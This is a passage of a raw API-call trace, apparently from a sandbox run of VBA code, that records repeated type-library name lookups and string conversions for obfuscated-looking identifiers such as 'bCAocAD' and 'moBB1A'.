wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62c26, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="bCAocAD") returned 8 [0069.220] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="bCAocAD", lHashVal=0x10d2e4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62c26, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="bCAocAD") returned 8 [0069.220] ITypeComp:RemoteBind (in: This=0x665bd30, szName="bCAocAD", lHashVal=0x10d2e4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.220] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bCAocAD") returned 0x10d2e4 [0069.220] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="bCAocAD" | out: _Dst="bCAocAD") returned 0x0 [0069.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="bCAocAD") returned 8 [0069.220] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.220] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="bCAocAD", lHashVal=0x10d2e4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.220] IUnknown:Release (This=0x665ba50) returned 0xd [0069.220] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.220] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="bCAocAD", lHashVal=0x10d2e4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.220] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.220] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.220] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="bCAocAD", lHashVal=0x10d2e4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.220] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.220] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.220] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="bCAocAD", lHashVal=0x10d2e4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.220] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62c26, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="bCAocAD") returned 8 [0069.221] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="bCAocAD", lHashVal=0x10d2e4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.221] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.221] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62c26 | out: _Dst=0x67c2d40) returned 0x0 [0069.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_bCAocAD") returned 0x10d668 [0069.221] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_bCAocAD" | out: _Dst="_B_var_bCAocAD") returned 0x0 [0069.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_bCAocAD") returned 15 [0069.221] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.221] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_bCAocAD", lHashVal=0x10d668, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.221] IUnknown:Release (This=0x665ba50) returned 0xd [0069.221] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.221] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_bCAocAD", lHashVal=0x10d668, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.221] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.221] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.221] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_bCAocAD", lHashVal=0x10d668, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.221] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.221] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.221] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_bCAocAD", lHashVal=0x10d668, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.221] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.221] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.221] IUnknown:Release (This=0x665ba50) returned 0xd [0069.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11b4e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_bCAocAD") returned 15 [0069.221] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_bCAocAD", lHashVal=0x10d668, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x63006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x63006f00000000, pDummy=0x0) returned 0x0 [0069.221] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62c26 | out: _Dst=0x144ec0) returned 0x0 [0069.222] ITypeComp:RemoteBind (in: This=0x665ba60, szName="f1oxAAG", lHashVal=0x101c75, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62d22, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="f1oxAAG") returned 8 [0069.222] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="f1oxAAG", lHashVal=0x101c75, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62d22, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="f1oxAAG") returned 8 [0069.222] ITypeComp:RemoteBind (in: This=0x665bd30, szName="f1oxAAG", lHashVal=0x101c75, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="f1oxAAG") returned 0x101c75 [0069.222] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="f1oxAAG" | out: _Dst="f1oxAAG") returned 0x0 [0069.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="f1oxAAG") returned 8 [0069.222] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.222] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="f1oxAAG", lHashVal=0x101c75, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.222] IUnknown:Release (This=0x665ba50) returned 0xd [0069.222] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.222] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="f1oxAAG", lHashVal=0x101c75, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.222] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.222] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.222] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="f1oxAAG", lHashVal=0x101c75, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.222] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.222] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.222] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="f1oxAAG", lHashVal=0x101c75, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.222] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62d22, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="f1oxAAG") returned 8 [0069.222] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="f1oxAAG", lHashVal=0x101c75, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.222] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.222] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62d22 | out: _Dst=0x67c2d40) returned 0x0 [0069.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_f1oxAAG") returned 0x101ff9 [0069.223] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_f1oxAAG" | out: _Dst="_B_var_f1oxAAG") returned 0x0 [0069.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_f1oxAAG") returned 15 [0069.223] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.223] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_f1oxAAG", lHashVal=0x101ff9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.223] IUnknown:Release (This=0x665ba50) returned 0xd [0069.223] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.223] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_f1oxAAG", lHashVal=0x101ff9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.223] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.223] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.223] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_f1oxAAG", lHashVal=0x101ff9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.223] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.223] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.223] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_f1oxAAG", lHashVal=0x101ff9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.223] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.223] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.223] IUnknown:Release (This=0x665ba50) returned 0xd [0069.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11b7e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_f1oxAAG") returned 15 [0069.223] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_f1oxAAG", lHashVal=0x101ff9, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x41007800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x41007800000000, pDummy=0x0) returned 0x0 [0069.223] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62d22 | out: _Dst=0x144ec0) returned 0x0 [0069.223] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wBcAAQAB", lHashVal=0x102e65, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62cf6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wBcAAQAB") returned 9 [0069.223] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wBcAAQAB", lHashVal=0x102e65, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62cf6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wBcAAQAB") returned 9 [0069.224] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wBcAAQAB", lHashVal=0x102e65, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wBcAAQAB") returned 0x102e65 [0069.224] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="wBcAAQAB" | out: _Dst="wBcAAQAB") returned 0x0 [0069.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="wBcAAQAB") returned 9 [0069.224] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.224] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wBcAAQAB", lHashVal=0x102e65, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.224] IUnknown:Release (This=0x665ba50) returned 0xd [0069.224] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.224] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wBcAAQAB", lHashVal=0x102e65, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.224] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.224] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.224] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wBcAAQAB", lHashVal=0x102e65, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.224] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.224] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.224] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wBcAAQAB", lHashVal=0x102e65, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.224] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62cf6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wBcAAQAB") returned 9 [0069.224] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wBcAAQAB", lHashVal=0x102e65, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.224] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.224] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62cf6 | out: _Dst=0x67c2d40) returned 0x0 [0069.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wBcAAQAB") returned 0x1005ee [0069.224] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_wBcAAQAB" | out: _Dst="_B_var_wBcAAQAB") returned 0x0 [0069.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_wBcAAQAB") returned 16 [0069.224] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.224] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wBcAAQAB", lHashVal=0x1005ee, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.224] IUnknown:Release (This=0x665ba50) returned 0xd [0069.225] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.225] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wBcAAQAB", lHashVal=0x1005ee, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.225] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.225] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.225] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wBcAAQAB", lHashVal=0x1005ee, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.225] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.225] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.225] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wBcAAQAB", lHashVal=0x1005ee, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.225] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.225] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.225] IUnknown:Release (This=0x665ba50) returned 0xd [0069.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11bae, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_wBcAAQAB") returned 16 [0069.225] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wBcAAQAB", lHashVal=0x1005ee, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.225] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62cf6 | out: _Dst=0x144ec0) returned 0x0 [0069.225] ITypeComp:RemoteBind (in: This=0x665ba60, szName="moBB1A", lHashVal=0x102a1f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62d4a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="moBB1A") returned 7 [0069.225] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="moBB1A", lHashVal=0x102a1f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62d4a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="moBB1A") returned 7 [0069.225] ITypeComp:RemoteBind (in: This=0x665bd30, szName="moBB1A", lHashVal=0x102a1f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="moBB1A") returned 0x102a1f [0069.225] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="moBB1A" | out: _Dst="moBB1A") returned 0x0 [0069.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="moBB1A") returned 7 [0069.226] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.226] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="moBB1A", lHashVal=0x102a1f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.226] IUnknown:Release (This=0x665ba50) returned 0xd [0069.226] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.226] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="moBB1A", lHashVal=0x102a1f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.226] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.226] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.226] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="moBB1A", lHashVal=0x102a1f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.226] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.226] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.226] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="moBB1A", lHashVal=0x102a1f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.226] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62d4a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="moBB1A") returned 7 [0069.226] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="moBB1A", lHashVal=0x102a1f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.226] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.226] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a62d4a | out: _Dst=0x67c2d40) returned 0x0 [0069.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_moBB1A") returned 0x10a4c8 [0069.226] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_moBB1A" | out: _Dst="_B_var_moBB1A") returned 0x0 [0069.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_moBB1A") returned 14 [0069.226] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.226] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_moBB1A", lHashVal=0x10a4c8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.226] IUnknown:Release (This=0x665ba50) returned 0xd [0069.226] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.226] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_moBB1A", lHashVal=0x10a4c8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.226] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.226] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.226] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_moBB1A", 